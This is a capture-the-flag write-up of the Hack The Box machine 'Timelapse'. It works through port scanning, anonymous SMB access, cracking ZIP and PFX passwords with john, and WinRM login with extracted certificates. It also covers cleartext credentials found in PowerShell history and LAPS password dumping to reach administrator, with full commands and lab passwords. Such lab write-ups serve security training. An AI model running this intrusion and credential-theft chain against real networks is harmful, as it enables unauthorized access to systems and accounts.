Timelapse Writeup

Learned a lot doing this box. It starts off with accessing an open SMB share that contains a password protected ZIP. Cracking the password for the ZIP allowed access to a PFX file. After cracking the password associated with the PFX file I was able to extract a .crt and .key file. Using those files, I was able to login via WinRM.

After doing some recon on the local box I discovered a clear text password for another user in the PowerShell history file. Said user was part of a group that could read LAPS passwords. And it just so happened to be the password for the administrator account.

Initial Recon

Started with the standard nmap scan. Followed by a more comprehensive scan to check all TCP ports.

For a long while I got in a bad habit of only using nmap‘s’ default port range of the top 1000 most commonly used ports. There would be times where I would bang my head against the wall for hours only to later realize that a scan of all 65,000-ish TCP ports had to be done because a service was open on some non-standard port.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.133.91
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 12:02 CDT
Nmap scan report for 10.129.133.91
Host is up (0.057s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-04-24 01:02:45Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-24T01:02:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.06 seconds

Below is the results of a nmap scan against all TCP ports. The difference in information from the two scans is clearly evident.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo nmap -A -T4 -p- -oA nmap/full 10.129.133.91
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 12:02 CDT
Nmap scan report for 10.129.133.91
Host is up (0.057s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-24 01:04:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-04-24T01:06:09+00:00; +8h00m00s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
58679/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-24T01:05:33
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   63.10 ms 10.10.14.1
2   63.14 ms 10.129.133.91

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.52 seconds

There are quite a few ports open, but the ones of note are – SMB on port 445 and WinRM over HTTPS on port 5986.

Initial Access

SMB

The first thing I do when I see SMB is list shares, if possible. Fortunately, an anonymous login was allowed so I could list and connect to shares.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ smbclient --no-pass -L //$tgt                 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Connecting to Shares revealed a couple interesting directories. Ended up pulling everything down and taking a look at the files.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ smbclient -U '' \\\\$tgt\\Shares
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 10:39:15 2021
  ..                                  D        0  Mon Oct 25 10:39:15 2021
  Dev                                 D        0  Mon Oct 25 14:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 10:48:42 2021

                6367231 blocks of size 4096. 1283328 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *

In the Dev folder there was winrm_backup.zip which was password protected. Time to get cracking with john! The first step is to use zip2john to create a hash that can then be cracked with john.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ john --wordlist=/opt/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2022-08-26 08:18) 4.166g/s 14472Kp/s 14472Kc/s 14472KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Within the ZIP is a PFX file. The PFX file, which is in a PKCS#12 format, contains the SSL certificate (public keys) and the corresponding private keys. This file could be my way into the system. WinRM was running over HTTPS so it requires a .key and .crt for login. Fortunately, with this PFX file I can create those two files. But first I must discover the password associated with this PFX file before extracting the public and private keys. Luckily, john can help with the first step.

First I create a hash of the PFX file with pfx2john and then crack it with john.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ pfx2john legacyy_dev_auth.pfx > legacy_hash.txt                                                                                                                                                                                                                                         
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 24
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zip

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy_hash.txt                                                                                                                                                                     1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:56 DONE (2022-04-23 20:58) 0.01776g/s 57413p/s 57413c/s 57413C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

With the password I can now extract the encrypted .key file from the PFX file.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out keyfilename-encrypted.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:                                                                                                                                                                                                                                             
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 28
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zip

Then I extract the .crt file from the PFX file.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificatename.crt                                                                                                                                                  130 ⨯
Enter Import Password:                                                                                                                                                                                                                                             
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 32
-rw------- 1 crimson crimson 1238 Apr 23 21:01 certificatename.crt
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zip

Then I decrypt the .key file from earlier.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ openssl rsa -in keyfilename-encrypted.key -out keyfilename-decrypted.key         
Enter pass phrase for keyfilename-encrypted.key:
writing RSA key                                                                                                                                                                                                                                             
┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ ll
total 36
-rw------- 1 crimson crimson 1238 Apr 23 21:01 certificatename.crt
-rw-r--r-- 1 crimson crimson 4962 Apr 23 16:24 hash.txt
-rw------- 1 crimson crimson 1675 Apr 23 21:02 keyfilename-decrypted.key
-rw------- 1 crimson crimson 2102 Apr 23 21:00 keyfilename-encrypted.key
-rw-r--r-- 1 crimson crimson 5077 Apr 23 20:57 legacy_hash.txt
-rwxr-xr-x 1 crimson crimson 2555 Oct 25 09:21 legacyy_dev_auth.pfx
-rw-r--r-- 1 crimson crimson 2611 Apr 23 14:22 winrm_backup.zip

I used the following resource to guide me through this process – https://medium.com/beingcoders/easy-way-to-convert-pfx-to-crt-key-files-in-10-minutes-683849242c65

RDP

Now that I have the .key and .crt files, I connect with Evil-WinRM. Remember, nmap revealed WinRM on port 5986. That port signifies that WinRM is ran within HTTPS which requires a certificate.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse/Dev]
└─$ evil-winrm -u legacyy -r TIMELAPSE -i $tgt -S -p 5986 -c certificatename.crt -k keyfilename-decrypted.key                                                                                                           1 ⨯

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

After doing a little bit of research I found HackTricks’ guide to Windows Priv Esc. One thing he suggest you check is PowerShell history in ConsoleHost_history.txt. In this case it revealed clear text credentials for the user svc_deploy.

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

Priv Esc

PowerShell

With the credentials found in ConsoleHost_history.txt, I login via evil-winrm. From there I look to see what groups the user is part of.

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ evil-winrm -r TIMELAPSE -i $tgt -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S        

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/3/2022 1:39:56 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

LAPS

svc_deploy seems to be part of the LAPS_Readers group. Seems obvious what kind of permissions that group has so I attempted read LAPS passwords with lapsdumper. And sure enough I get a password!

┌──(crimson㉿crimson)-[~/HTB/Machines/Timelapse]
└─$ sudo lapsdumper -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -l 10.129.116.35 -d timelapse.htb                                                                                                                                        1 ⨯
DC01$:ch6M-56,jf64Qs2TnwuZK]6V

With administrator credentials I used what was found in the PowerShell history file to run commands to view the flag.

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'ch6M-56,jf64Qs2TnwuZK]6V' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('administrator', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{whoami}
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{gci C:\Users -recurse}
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock{get-content C:\users\trx\desktop\root.txt}